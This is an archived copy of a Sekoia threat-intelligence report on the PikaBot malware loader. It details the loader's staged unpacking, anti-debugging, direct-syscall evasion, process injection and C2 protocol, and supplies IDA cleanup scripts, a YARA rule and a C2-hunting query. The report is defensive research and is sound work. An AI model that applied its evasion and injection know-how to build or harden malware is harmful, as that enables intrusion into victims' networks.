{
	"id": "17742ad0-eb2a-4472-833b-a30b4cfb5e6a",
	"created_at": "2026-04-06T00:13:20.033643Z",
	"updated_at": "2026-04-10T03:33:30.409144Z",
	"deleted_at": null,
	"sha1_hash": "4f5652518458409da22148a2e2733c558aea9b10",
	"title": "PikaBot: a Guide to its Deep Secrets and Operations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 935216,
	"plain_text": "PikaBot: a Guide to its Deep Secrets and Operations\r\nBy Pierre Le Bourhis,\u0026nbsp;Quentin Bourgue\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2024-06-03 · Archived: 2026-04-05 23:05:31 UTC\r\nBetween 27 and 29 May 2024, international law enforcement agencies and partners conducted the Operation\r\nEndgame to disrupt criminal services, notably through taking down key botnet infrastructures, including those of\r\nIcedID, SystemBC, PikaBot, SmokeLoader and BumbleBee.\r\nThe Sekoia TDR team supported the French law enforcement agencies by providing valuable cyber threat\r\nintelligence, in particular on PikaBot.\r\nTable of contents\r\nIntroduction\r\nContext\r\nEmergence of PikaBot\r\nLarge-scale distribution\r\nInternals of PikaBot\r\nLoader stage 1\r\nJunk code\r\nLoader stage 2\r\nPikaBot core\r\nFinal words\r\nPikaBot C2 infrastructure\r\nProactively tracking PikaBot infrastructure\r\nEvolution over the year\r\nConclusion\r\nIoCs\r\nAnnexes\r\nAnnex 1 – Short campaign analysis\r\nAnnex 2 – List of banned process\r\nMITRE ATT\u0026CK TTPs\r\nExternal references\r\nIntroduction\r\nPikaBot is a malware loader, widely distributed since February 2023, that is used by Initial Access Brokers\r\n(IABs) to establish an initial foothold within a victim’s networks and to distribute additional payloads such as\r\nCobalt Strike and Meterpreter. Furthermore, several sources reported that successful PikaBot compromises led to\r\nthe deployment of the Black Basta ransomware\r\n12\r\n.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 1 of 38\n\nTechnical analysis shared in open source revealed close ties between PikaBot and other infamous malware\r\nfamilies, suggesting possible affiliation between their developers and operators. 
Specifically, PikaBot shares code\r\nsimilarities with Matanbuchus regarding traffic and string encryption, while its TLS certificate pattern for\r\nCommand \u0026 Control (C2) infrastructure is similar to the Qakbot one.\r\nSince its emergence in early 2023, PikaBot appears to be in active development, with a new major version\r\nreleased in February 2024. The malware employs advanced anti-analysis techniques to evade detection and harden\r\nanalysis, including system checks, indirect syscalls, encryption of next-stage and strings, and dynamic API\r\nresolution. The Sekoia Threat Detection \u0026 Research (TDR) team also identified multiple changes in the PikaBot\r\nC2 infrastructure throughout 2023.\r\nThis article provides an in-depth analysis of PikaBot, focusing on its anti-analysis techniques implemented in the\r\ndifferent malware stages. Additionally, this report shares technical details on PikaBot C2 infrastructure.\r\nContext\r\nEmergence of PikaBot\r\nIn February 2023, PikaBot was first observed being distributed through a thread-hijacking phishing campaign by\r\nthe IAB group TA5773. The infection chain involved a OneNote file attached to a thread-hijacked email, which\r\nran a CMD script to download and execute a PikaBot DLL.\r\nAt that time, the TA577 intrusion set was known for widely distributing Qakbot using similar techniques. Some\r\ncybersecurity researchers initially speculated that the malware might be Matanbuchus, due to the similarities in C2\r\ntraffic. Further analysis revealed that the samples belonged to a new malware family. It was later named “PikaBot”\r\nbecause of the string “iPikaBot” found on an HTML page of the C2 servers4.\r\nIn August 2023, law enforcement agencies conducted a takedown of the Qakbot infrastructure. 
As a result of this\r\noperation and starting from September 2023, TA577 – one of Qakbot’s largest affiliates allegedly using AA, BB\r\nand TR botnets – switched to distributing other botnets, PikaBot being one of them. Since then, TA577’s phishing\r\ncampaigns mainly distributed PikaBot in large-scale operations.\r\nLarge-scale distribution\r\nBetween February 2023 and April 2024, PikaBot was primarily spread by TA577 through emails embedding\r\ndownload URLs within the body or as attachments. Clicking on these URLs directed users to download, and then\r\nto execute files aimed at deploying PikaBot through various infection chains.\r\nThese execution chains included5:\r\nOneNote file \u003e CMD script \u003e DLL\r\nJavaScript \u003e PowerShell \u003e DLL  \r\nZIP \u003e LNK \u003e CMD \u003e DLL  \r\nZIP \u003e JavaScript \u003e DLL\r\nZIP \u003e JavaScript \u003e CMD \u003e DLL\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 2 of 38\n\nHTML smuggling \u003e ZIP \u003e JavaScript \u003e CMD \u003e DLL\r\nREV \u003e CMD script \u003e CMD \u003e DLL\r\nZIP \u003e JavaScript \u003e CMD \u003e PowerShell \u003e DLL\r\nZIP \u003e HTA \u003e EXE\r\nJavaScript \u003e CMD \u003e DLL\r\nZIP \u003e IMG \u003e LNK \u003e DLL\r\nZIP \u003e MSI \u003e DLL\r\nZIP \u003e JavaScript \u003e PowerShell \u003e EXE\r\nZIP \u003e JavaScript \u003e CMD \u003e EXE\r\nZIP \u003e JAR \u003e DLL\r\nXLS \u003e JavaScript \u003e DLL\r\nZIP \u003e XLS \u003e JavaScript \u003e DLL\r\nZIP \u003e SMB share \u003e EXE\r\nISO \u003e EXE \u003e DLL \u003e CMD \u003e DLL\r\nIn December 2023, PikaBot was also distributed via malvertising. 
A Google Ads campaign promoted a malicious\r\nwebsite impersonating AnyDesk, which led to the download of a signed MSI installer, which, upon execution,\r\nturned out to be PikaBot6.\r\nThese phishing campaigns aimed at spreading PikaBot at large-scale in order to infect a significant number of\r\nvictims and reach as many hosts as possible in valuable organisations.\r\nInternals of PikaBot\r\nPikaBot is a malware composed of three stages, each stage being a DLL. To isolate them and facilitate their\r\nanalysis, we use the tool dll_to_exe to debug each stage independently.\r\nThe version of PikaBot we analysed is 1.8.32-beta. At first, the sample that triggered our PikaBot analysis was\r\n“PERFERENDISF.jar” (SHA-1: 959da0fb174a8e4db238d08a3f5076a2f43c0f25).\r\nLoader stage 1\r\nThe initial stage of PikaBot functions as a PE unpacker and the subsequent stages are deobfuscated using XOR\r\noperations. These operations employ various keys, which are stored in cleartext within the PE. The next stage is\r\nmeticulously reconstructed in memory through a specific process.\r\nTo prevent direct references to well-known functions from standard libraries, such as Kernel32.dll and User32.dll,\r\nthe malware uses dynamic API imports. The following pseudocode illustrates the use of dynamic API resolution,\r\nas well as a part of the PE deobfuscation and reconstruction process.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 3 of 38\n\nFigure 1. Extract of the function used to deobfuscate the Stage 2\r\nIn the Figure 1, “ptr_1” represents a memory page with both read and write permissions, responsible for handling\r\nthe PE headers. As for “ptr_2”, it has read, write, and execute permissions, as it manages the .text section. 
PikaBot\r\nrequires this permission because the PE is not written to the disk; instead, it uses reflective code loading to\r\nexecute the second stage directly in memory.\r\nDuring the analysis, the reconstruction of stage 2 is carried out step-by-step:\r\n1. Allocate PE headers;\r\n2. Deobfuscate the DOS header;\r\n3. Deobfuscate and copy the PE sections;\r\n4. Fix .reloc section;\r\n5. Fix import table.\r\nThe malware must fix its imports and relocations tables for several reasons. Primarily, the ‘reloc’ fix is necessary\r\nbecause, in the next stage, PikaBot utilises some hard-coded addresses to establish the direct syscall mechanism.\r\nAs explained in the article A dive into the PE file format – PE file structure – Part 6: PE Base Relocations, the\r\n.reloc section contains a Data Directory that separates blocks, each block representing the base relocations for a\r\n4K page. Every block begins with an IMAGE_BASE_RELOCATION structure:\r\ntypedef struct _IMAGE_BASE_RELOCATION {\r\n DWORD VirtualAddress;\r\n DWORD SizeOfBlock;\r\n} IMAGE_BASE_RELOCATION;\r\nA quick and straightforward method to obtain the second stage of the loader, with all sections properly\r\ndeobfuscated and fixed (e.g. .reloc, .idata), is to set a breakpoint in a debugger at the end of the main function, just\r\nbefore the next stage is executed, and then to dump the memory section. At this stage, no environment detection or\r\nanti-debugging techniques are involved.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 4 of 38\n\nFigure 2. PikaBot stage 2 headers correctly dumped\r\nJunk code\r\nBefore delving into the analysis of PikaBot’s next stages, it is necessary to introduce the integrated junk code.\r\nIndeed, PikaBot incorporates a significant amount of junk code in the next stages, including calls to useless\r\nfunctions (see Figure 3) and to pointless Windows functions. Additionally, the malware contains many\r\nunnecessary boolean expressions. 
Calls to garbage functions and use of useless boolean expressions are frequently intermingled with meaningless loops.\r\nFigure 3. Example of a decompiled junk function\r\nTo save time during our analysis, we used two scripts to clean up the code. The first script maintains a list of useless functions and searches for cross references to these functions in the code to remove them. The following is a snippet of the code used for this purpose:\r\nimport ida_bytes\r\nfrom idautils import CodeRefsTo\r\n\r\ndef remove_junk_call(addressFunctionsToNOP):\r\n    # Overwrite every 5-byte call to each junk function with NOPs\r\n    for elt in addressFunctionsToNOP:\r\n        for ref in CodeRefsTo(elt, 1):\r\n            ida_bytes.patch_bytes(ref, b\"\\x90\" * 5)\r\n\r\n# Replace the placeholders with the addresses of the junk functions\r\nremove_junk_call([\"0xuseless_fnc1\", \"0xuseless_fnc2\",])\r\nBy implementing the second script, we identified that PikaBot adds numerous boolean expressions. To prevent decompiler optimisations, the malware uses global variables in these boolean expressions, so that they are not optimised away and removed. It is noteworthy that all the pointless global variables are located in the same location at the end of the “.data” section (these variables are coloured in red in the figure below).\r\nFigure 4. The global variables used in the pointless boolean expressions are in the red square\r\nWhile this script is still a work in progress, it undoubtedly provides valuable assistance in sanitising the PikaBot code. The script attempts to identify code with a boolean expression (“xor”, “sub”, “add”, “imul”, “or”) that refers to a variable located in the area we identified, and then cleans each operation referring to it.\r\nimport idautils\r\nimport ida_bytes\r\nimport ida_allins\r\nimport ida_funcs\r\nimport ida_ua\r\nimport idaapi\r\nimport idc\r\nfrom idautils import Heads\r\n\r\ndword_start: int = 0x0410B80 # replace by the start address of the area (red square)\r\ndword_end: int = 0x04110C4 # replace by the end address of the area (red square)\r\n\r\ndef addr_in_trash_range(addr: int) -\u003e bool:\r\n    # True when addr points into the block of junk global variables\r\n    return dword_start \u003c= addr \u003c= dword_end\r\n\r\ndef nop(addr: int, length: int) -\u003e None:\r\n    ida_bytes.patch_bytes(addr, b\"\\x90\" * length)\r\n\r\ndef func_cleaner(ea):\r\n    prev_reg = None # register last loaded from a junk global, if any\r\n    func = ida_funcs.get_func(ea)\r\n    for _ea in Heads(func.start_ea, func.end_ea - 0x1):\r\n        insn = idaapi.insn_t()\r\n        length = idaapi.decode_insn(insn, _ea)\r\n        if insn.get_canon_mnem() in [\"xor\", \"sub\", \"imul\", \"add\", \"or\"]:\r\n            if addr_in_trash_range(insn.Op1.addr) or addr_in_trash_range(insn.Op2.addr):\r\n                nop(_ea, length)\r\n            if prev_reg is not None:\r\n                # the tracked register is combined with a large immediate: stop tracking it\r\n                if (\r\n                    prev_reg == idc.print_operand(_ea, 0)\r\n                    and idc.print_operand(_ea, 0) != idc.print_operand(_ea, 1)\r\n                    and \"[\" not in idc.print_operand(_ea, 1)\r\n                    and insn.Op2.value \u003e 0xFFFF\r\n                ):\r\n                    prev_reg = None\r\n        if insn.get_canon_mnem() == \"imul\":\r\n            # three-operand imul: also check the second and third operands\r\n            if addr_in_trash_range(insn.ops[1].addr) or addr_in_trash_range(insn.ops[2].addr):\r\n                nop(_ea, length)\r\n            if prev_reg is not None:\r\n                if (\r\n                    prev_reg == idc.print_operand(_ea, 0)\r\n                    and idc.print_operand(_ea, 0) != idc.print_operand(_ea, 1)\r\n                    and \"[\" not in idc.print_operand(_ea, 1)\r\n                    and insn.Op2.value \u003e 0xFFFF\r\n                ):\r\n                    prev_reg = None\r\n        if insn.itype == ida_allins.NN_mov:\r\n            # case mov dword_X, eax\r\n            if addr_in_trash_range(insn.Op1.addr):\r\n                # in range of the trash DWORD_X\r\n                nop(_ea, length)\r\n            if insn.Op1.type == ida_ua.o_reg and insn.Op2.type == ida_ua.o_mem:\r\n                if addr_in_trash_range(insn.Op2.addr):\r\n                    prev_reg = idc.print_operand(_ea, 0)\r\n                    # in range of the trash DWORD_X\r\n                    nop(_ea, length)\r\n\r\ndef clean_all_functions():\r\n    for func_ea in idautils.Functions(): # Iterate over all functions\r\n        func_cleaner(func_ea)\r\nLoader stage 2\r\nThe second stage of the loader involves string obfuscation, environment detection, and anti-debugging techniques. The objective of this stage is to halt the malware execution under specific conditions, such as the detection of debuggers or network and system analysis tools. After passing all the checks, the loader deobfuscates the final stage and executes it.\r\nThe code of this stage is articulated around a central C structure that contains pointers to required API functions and pointers to the next stage buffer. Our version of the structure is as follows:\r\nstruct PIKABOT_stage2_core {\r\n    _DWORD debug_flag;\r\n    _DWORD LdrLoadDLL;\r\n    _DWORD LdrGetProcedureAddress;\r\n    _DWORD RtlAllocateHeap;\r\n    unsigned __int8 (__stdcall *RtlFreeHeap)(void *, _DWORD, int);\r\n    _DWORD RtlDecompressBuffer;\r\n    _DWORD RtlCreateProcessParametersEx;\r\n    _DWORD RtlDestroyProcessParameters;\r\n    _DWORD ExitProcess;\r\n    void (__stdcall *CheckRemoteDebuggerPresent)(int, int *);\r\n    int (__stdcall *VirtualAlloc)(int, int, int, int);\r\n    unsigned int (__stdcall *GetThreadContext)(int, _DWORD *);\r\n    void (__stdcall *VirtualFree)(_DWORD *, _DWORD, int);\r\n    int (__stdcall *CreateToolhelp32Snapshot)(int, _DWORD);\r\n    int (__stdcall *Process32FirstW)(int, int *);\r\n    unsigned int (__stdcall *Process32NextW)(int, int *);\r\n    _DWORD ntdll_base_address;\r\n    _DWORD kernel32_base_addr;\r\n    int unknown0;\r\n    int* ptr_next_stage;\r\n    int size_next_stage;\r\n    _TEB *TEB;\r\n};\r\nEnvironment detection \u0026 anti-debug\r\nPikaBot attempts to detect an 
attached debugger by reading the debug registers, which can be accessed from the\r\nthread context using the GetThreadContext from Kernel32.dll. As described in the Check Point’s anti-debug cheat\r\nsheet, non-zero values in any of these registers may indicate that a debugger is attached.\r\nFigure 5. PikaBot checking non-zero values in all debug registers\r\nPikaBot stage 2 comes with numerous environment checks using a list of banned processes, their names being\r\nencrypted using RC4. In the figure 6, we provide processes that PikaBot attempts to detect, with each name\r\nsequence encrypted with a separate RC4 key.\r\nThe malware captures a snapshot of the running processes and checks if any of them are present on its ban list.\r\nPikaBot utilises the conventional method to obtain and iterate over running processes, which involves using the\r\nfollowing three Windows functions: CreateToolhelp32Snapshot, Process32First, and Process32Next. If a banned\r\nprocess is detected, the malware sets the first member of its core structure to ‘true’ and subsequently terminates its\r\nexecution. The list of banned process names is provided in Annex 2.\r\nNext stage execution\r\nAfter performing the environment detection, the loader decrypts the next stage. To remain stealthy, PikaBot\r\ndivides the next stage into chunks of data (in this campaign fourteen chunks). Each chunk is RC4 encrypted with\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 8 of 38\n\na unique key and stored in base64 format in the DLL. Additionally, the key used to decrypt each chunk is also\r\nencrypted with a unique RC4 key.\r\nFigure 6. RC4 key decryption to get the RC4 key to decrypt the subsequent stage chunk\r\nThe RC4 key used to decrypt the subsequent stage chunk is embedded within other random strings. 
As previously mentioned, PikaBot incorporates a significant amount of garbage code, including calls to superfluous API functions and fake functions designed to waste analysts’ time and mislead EDRs.\r\nBecause of the junk code and the way PikaBot decrypts the next stage chunks, we automated the process of getting the RC4 keys and the address of the obfuscated chunks. The mnemonics employed to construct the RC4 key for the chunk can be identified using the following YARA signature:\r\nrule PikaBot_intermediate_rc4_key {\r\n    meta:\r\n        author = \"Sekoia\"\r\n    strings:\r\n        $qmemcopy = {\r\n            8D BD ?? ?? ?? ?? // lea edi, []\r\n            BE ?? ?? ?? ?? // mov esi, offset \u003cencrypted key\u003e\r\n            53 // push ebx\r\n            81 EC ?? ?? 00 00 // sub esp, \u003csize of the data\u003e\r\n        }\r\n        $load_str = {\r\n            F3 A? // rep movsb\r\n            8D BD ?? ?? ?? ?? // lea edi, [ebp + local var]\r\n            BE DD ?? ?? ?? // mov esi, offset \u003caddr of a string\u003e\r\n            B9 ?? 00 00 00 // mov ecx, \u003csize of the data\u003e\r\n            F3 A? // rep movsb\r\n        }\r\n        $mov_ptr_dword = {\r\n            C7 85 ?? ?? ?? ?? ?? ?? // mov dword ptr [ebp + local var], \u003cstring value\u003e\r\n            ?? ??\r\n            F3 A? // rep movsb\r\n        }\r\n    condition:\r\n        $qmemcopy and ($load_str or $mov_ptr_dword)\r\n}\r\nWith the matches of the above YARA rule, we obtain the addresses of the functions that decrypt the next stage chunks. After removing the junk code, the function responsible for building the RC4 key and calling the base64 decoding and RC4 decryption function on the corresponding chunk is as follows:\r\nFigure 7. Cleaned decompiled code used to build the RC4 key and call the decoding and decryption routine\r\nFigure 8. 
Last stage chunk RC4 decryption with CyberChef\r\nOnce all the blobs comprising the core of PikaBot (next stage) are decrypted, the current stage uses RtlCreateProcessParametersEx and RtlCreateProcess to prepare a new process to host the PikaBot core DLL. It initiates the next stage by launching “ctfmon.exe -p 1234” in a new process. At this point, the process (ctfmon.exe) that will host the PikaBot core remains in an unstarted state, and the decrypted next stage resides solely in the stage 2 memory area.\r\nBefore executing the malware’s final stage, PikaBot allocates memory within the host process. It designates memory space to contain valid PE headers, and we observe a comprehensive process of rebuilding the DOS and NT headers. Subsequently, each section of the next stage is allocated and copied into the host process.\r\nN.B.: In Figure 9, the decrypted chunk contains the PE header along with some additional or missing bytes, resulting from the RtlCompression. Each chunk undergoes decompression via the RtlDecompressBuffer Windows API function before being copied into the host process.\r\nSince February 2024, the latest version of PikaBot seeks to evade detection by incorporating a new technique: the use of SysWhispers2. By employing direct syscalls, the malware attempts to bypass Endpoint Detection and Response (EDR) solutions that use hooks in the ntdll.dll API in userland. 
Further information and details on\r\nthis technique are discussed in the Outflank article: Red Team Tactics: Combining Direct System Calls and sRDI\r\nto bypass AV/EDR.\r\nSysWhisper2 relies on two structures: “_SW2_SYSCALL_ENTRY” and “_SW2_SYSCALL_LIST”\r\nstruct _SW2_SYSCALL_ENTRY\r\n{\r\n DWORD Hash;\r\n DWORD Address;\r\n}\r\nstruct _SW2_SYSCALL_LIST\r\n{\r\n DWORD Count;\r\n SW2_SYSCALL_ENTRY Entries[SW2_MAX_ENTRIES];\r\n}\r\nThe ‘_SW2_SYSCALL_ENTRY’ establishes a correspondence between a hash and an address in ntdll, where the\r\naddress is close to the syscall execution (see Figure 9). The ‘_SW2_SYSCALL_LIST’ stores each entry. This\r\nstructure is used to invoke a direct syscall by accessing its corresponding hash, effectively creating a gateway\r\nbetween the malware and the direct syscall address. The technique, along with the method for identifying which\r\nsyscall corresponds to which hash, is detailed in this article. \r\nPikaBot implemented a wrapper (Figure 9) saving the return address, where the program must return after making\r\nthe direct syscall. The wrapper is also responsible for retrieving the address in ntdll (see Figure 10 ) for a given\r\nhash and then making the direct call.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 11 of 38\n\nFigure 9. Decompiled version of the SysWhispers2 wrapper function used by PikaBot\r\nFigure 10. 
Example of address in ntdll present in the SysWhispers list entries\r\nIn this sample of PikaBot, the following direct syscalls are used:\r\nZwReadVirtualMemory NtFreeVirtualMemory NtAllocateVirtualMemory\r\nZwSystemDebugControl ZwQueryInformationProcess NtGetContextThread\r\nZwClose NtOpenProcess ZwFreeVirtualMemory\r\nNtClose NtQuerySystemInformation ZwWriteVirtualMemory\r\nZwResumeThread ZwOpenProcess ZwQuerySystemInformation\r\nNtResumeThread NtCreateUserProcess NtReadVirtualMemory\r\nZwSetContextThread NtQueryInformationProcess NtWriteVirtualMemory\r\nNtSetContextThread NtSystemDebugControl ZwAllocateVirtualMemory\r\nZwCreateUserProcess ZwGetContextThread\r\nTable 1. List of direct syscall present in PikaBot stage 2\r\nThe execution of the final stage is accomplished through the thread hijacking technique. Stage 2 creates a thread\r\nwith an entry point specified in the PE ‘OptionalHeader-\u003eAddressOfEntryPoint,’ which was previously set by the\r\ncurrent stage. We share the pseudo-valid C code of the function responsible for setting up and executing the last\r\nstage at the following URL. Ultimately, the function configures the thread context to resume the pending thread\r\nand execute PikaBot’s final stage.\r\nPikaBot core\r\nA swift examination of the code reveals a substantial structure used throughout the entire execution of the stage.\r\nThe primary function of the PikaBot core is to initially construct this structure. 
The construction process involves importing the necessary DLLs, dynamically resolving API functions from the loaded DLLs, and parsing the configuration stored in cleartext within the PE to assign values such as User-Agent, C2 IP address, and C2 URL to the structure members.\r\nOnce the structure is established, the malware performs host fingerprinting, which is then sent to the C2. Subsequently, the bot enters a listening state, beaconing its C2 and awaiting new orders to execute on the infected host. The next section is dedicated to the malware’s communication with its C2 and gives comprehensive details.\r\nIn this phase, the malware employs an uncommon technique to dynamically resolve APIs. First, it loads the DLL to acquire a handle to it, then it uses the LdrGetProcedureAddress function from ntdll to assign the address of the loaded function to one of the malware structure members.\r\nLdrGetProcedureAddress(\r\n    IN HMODULE ModuleHandle,\r\n    IN PANSI_STRING FunctionName OPTIONAL,\r\n    IN WORD Ordinal OPTIONAL,\r\n    OUT PVOID *FunctionAddress\r\n);\r\nAs presented in the Zscaler article [7], the function to resolve the function hash is as follows:\r\ndef hash_pika(api_name: bytes, seed: int = 0x2329) -\u003e int:\r\n    checksum = seed\r\n    for c in api_name:\r\n        if c \u003e 0x60:\r\n            c -= 0x20 # lower-case letters are folded to upper case\r\n        checksum = (c + (0x21 * checksum)) \u0026 0xffffffff\r\n    print(f\"{api_name.decode()} -\u003e 0x{checksum:x}\")\r\n    return checksum\r\nHowever, during the analysis of the dynamic API imports, we observed that the custom algorithm has a unique seed per sample: in the Zscaler analysis the seed is 0x113b, whereas in the current sample it is 0x2329.\r\nInterestingly, PikaBot checks the default language of the infected host only at the third stage of its execution. 
The list of countries has been updated; only Ukraine and Russia are filtered, whereas in previous versions more countries from the CIS were filtered: Georgia, Kazakhstan, Tajikistan, Russia, Ukraine, and Belarus.\r\nAfterwards, to avoid re-infecting the same host, the bot creates a mutex.\r\nFigure 11. Creation and verification of a Mutex\r\nC2 communication\r\nThe malware communicates with its command-and-control (C2) server over HTTP using raw data in the body of POST requests. Each PikaBot sample has a list of C2 IP addresses, and the malware selects them one after another until it receives a response to the initial payload (registering the bot with its ID and the victim’s information). The malware randomly chooses the URL used to send data from a list of available URLs stored in its configuration. The data is RC4 encrypted, and the key used for communication is sent to the C2 server in a request with the following format:\r\nThe first 16 bytes contain the configuration;\r\nThe next 32 bytes contain the RC4 key generated by the bot;\r\nThe remainder of the message is the data encrypted with the previous 32 bytes (RC4 key).\r\nAs mentioned in the Elastic Security Lab report, the developer(s) introduced a byte-shifting operation required before decrypting the payload. The number of bytes (“shifted size” in Figure 12) to be moved from the end of the encrypted message to the start is defined at offset 0x16 of the HTTP payload, located in the “bot config” in Figure 12. Sekoia.io provides a script to decrypt the network communication that is available on this gist.\r\nFigure 12. 
HTTP POST data message structure\r\nIn the example below (Figure 13), the Python script takes as input all the POST data from a network capture, extracted with tshark (“-Tfields -e data.data”).\r\nFigure 13. Output of the Python script used to decrypt the communication from a network capture.\r\nThe initial message transmitted to the C2 server encompasses the bot configuration, including the ID, key, and stream, as well as the fingerprint of the infected machine. The fingerprinted data remains consistent with the previous version, comprising the OS, username, hostname, CPU architecture, display adapter, information regarding a potential connection to a domain, and the list of running processes.\r\nFinally, after verifying that a C2 is available, PikaBot defines eleven tasks. Each task is identified by a unique command number:\r\n0x1fed: update beacon;\r\n0x1a5a: kill the bot;\r\n0x2672: undetermined purpose command;\r\n0xacb: execute command;\r\n0x36c: download and inject a PE into another remote process;\r\n0x792: download and inject a shellcode into another remote process;\r\n0x359, 0x3a6, 0x240: execute a command;\r\n0x985: enumerate running processes.\r\nEach time the malware receives a response from the C2, it checks this task ID to execute the corresponding function (see Figure 14 below):\r\nFigure 14. 
PikaBot Action Identifier and state machine\r\nPS: To help the understanding of the “state machine”, the following structures were used:\r\nstruct PIKABOT_ACTION\r\n{\r\n    int identifier;\r\n    int (__cdecl *callback)(int *);\r\n};\r\nstruct PIKABOT_ACTIONS_LIST\r\n{\r\n    PIKABOT_ACTION Actions[12];\r\n};\r\nFinal words\r\nPikaBot version 1.8.32-beta continues to be a complex and sophisticated piece of malware, with its multi-stage architecture and advanced functionalities. The recent updates to the malware have further enhanced its capabilities, making it even more challenging to detect and mitigate. The removal of AES encryption and of the JSON message format indicates that the malware authors also updated the C2 server code, so that it can handle the new message structure and obfuscation. Moreover, the incorporation of SysWhispers in stage 2 and the core DLL, as well as the addition of a significant amount of junk code, demonstrates their sophistication and determination to stay ahead of the curve.\r\nPikaBot C2 infrastructure\r\nSince its emergence in February 2023, Sekoia.io analysts have been tracking the PikaBot C2 servers using various methodologies, including proactive heuristic searches on internet scan engines and extraction of malware configurations. We share all collected PikaBot C2 servers and their initial detection dates in the IoCs section.\r\nProactively tracking PikaBot infrastructure\r\nSince the beginning, PikaBot C2 servers have been Nginx servers exposed on IP addresses, primarily on non-standard ports (e.g. 
1194, 2078, 2083 or 2222).\r\nThe server TLS certificates have changed over time, transitioning from certificates impersonating brands to\r\npseudo-randomly generated ones.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 16 of 38\n\nSekoia analysts have continuously monitored the evolution of the PikaBot C2 infrastructure and updated our\r\nheuristics, enabling us to proactively collect C2 IP addresses.\r\nTLS certificates impersonating Slack\r\nIn early February 2023, when PikaBot was discovered, the C2 used a TLS certificate impersonating a Slack\r\nserver:\r\nC=US, ST=CA, O=Slack Technologies Inc, OU=DigiCert Inc, CN=slack.com\r\nOf note, the HTTP response was a default 404 response from an Nginx server:\r\n HTTP/1.1 404 Not Found\r\n Server: nginx/1.18.0 (Ubuntu)\r\n Date: \u003cREDACTED\u003e\r\n Content-Type: text/html\r\n Content-Length: 564\r\n Connection: keep-alive\r\nBy correlating the TLS certificate with the HTTP response, it results in a server footprint consistent with that of\r\nPikaBot C2 servers.\r\nHTML pages impersonating technology brands\r\nBetween the end of February 2023 and May 2023, the PikaBot C2 servers impersonated multiple technology\r\nbrands, with HTTP requests to the root URL returning copies of the impersonated website.\r\nDuring May 2023, we regularly identified changes of the impersonated software on a weekly basis. The\r\nimpersonated brands included Slack, Discord, Flock, Zoho, Fleep, Fortinet and Twilio. 
The following are the title\r\nof the HTML response of PikaBot C2 servers:\r\n“Discord | Your Place to Talk and Hang Out”\r\n“Fleep – An ideal way to communicate”\r\n“Team Messenger \u0026 Online Collaboration Platform – Flock”\r\n“Slack is your productivity platform | Slack”\r\n“Global Leader of Cybersecurity Solutions and Services | Fortinet”\r\n“Zoho | Conjunto de software en la nube para empresas”\r\nDuring this period, the TLS certificates used by the PikaBot C2 servers were generated pseudo-randomly. We\r\nassess with high confidence that the TLS certificate was built as follows:\r\nCountry (C): a randomly selected country code from a list;\r\nState or province (ST): a randomly selected province code from a list of major-case two-letters code;\r\nOrganisation (O): a generated string using one or two words randomly selected from a list, optionally\r\nending with “Inc.” or “LLC.”;\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 17 of 38\n\nOrganisational unit (OU): a generated string using one or two words randomly selected from a list;\r\nLocation (L): a generated string using one or two words randomly selected from a list;\r\nCommon name (CN): a generated domain name possibly using a combination of words, concatenated with\r\na generic top-level domain (gTLD).\r\nThe following are examples of distinguished names of TLS certificates used by PikaBot C2 servers in May 2023:\r\nC=NZ, ST=UN, O=Anaudia Aquose Inc., OU=Halutz, L=Priorship, CN=lordless[.]name\r\nC=AE, ST=BE, O=Fumosity Inc., OU=Abattised, L=Heptatonic Gallinazo, CN=resonancessewars[.]tires\r\nC=AR, ST=QU, O=Grizzles Nonabrogable Inc., OU=Holohedral Croftland, L=Rehoused Functionaries,\r\nCN=alkaliesnonperspective[.]fish\r\nC=FR, ST=LE, O=Breekless, OU=Athwart, L=Pathed, CN=demonising[.]li\r\nC=GL, ST=LE, O=Speciology, OU=Mezquit, L=Acetylizer Unprayerful, CN=callipersoutane[.]com\r\nNoteworthy, these patterns of distinguished names are quite similar to those used 
by Qakbot C2 servers.\r\nWhile impersonating well-known technology brands may aim to deceive investigators looking at\r\ncommunications to the C2 servers, TDR analysts believe this behaviour makes tracking and detecting C2 servers\r\nmuch easier than using default responses would. We assess that the PikaBot operator regularly changed the\r\nimpersonated brands to evade detection by cybersecurity vendors, and eventually realised that this\r\nmasquerading technique was not effective.\r\nPseudo-randomly generated certificates\r\nIn November 2023, we observed that the PikaBot operator(s) ceased impersonating legitimate websites and\r\nreverted to using default server responses instead. They did not modify the generation of the TLS certificates used\r\nby PikaBot C2 servers. As a result, we updated our tracking heuristics to rely on the TLS certificates, the HTTP\r\nheaders and the JARM value, which has remained unchanged since at least May 2023:\r\n21d19d00021d21d21c21d19d21d21dd188f9fdeea4d1b361be3a6ec494b2d2.\r\nTo identify PikaBot C2 servers, TDR employs the following query, based on the JARM, regular expressions over the\r\nTLS distinguished name and the value of the HTTP header “Server”:\r\nservices:(\r\n  tls.certificates.leaf_data.issuer.province=/[A-Z]{2}/ and\r\n  tls.certificates.leaf_data.issuer.country=/[A-Z]{2}/ and\r\n  tls.certificates.leaf_data.issuer.organization=/[A-Z][a-z]{4,24}( [A-Z][a-z]{4,24})?( Inc.)?/ and\r\n  tls.certificates.leaf_data.issuer.common_name=/[a-z]{6,32}\\.[a-z]{2,8}/ and\r\n  jarm.fingerprint=\"21d19d00021d21d21c21d19d21d21dd188f9fdeea4d1b361be3a6ec494b2d2\" and\r\n  services.http.response.headers: (key:\"Server\" and value.headers=\"nginx\")\r\n)\r\nTo ensure comprehensive coverage of the entire PikaBot C2 infrastructure, we cannot rely solely on proactive\r\nheuristics, because internet scan engines do not consistently scan unusual ports such as those used by PikaBot C2\r\nservers. At the time of writing, the malware used high ports for its C2 servers, e.g. 
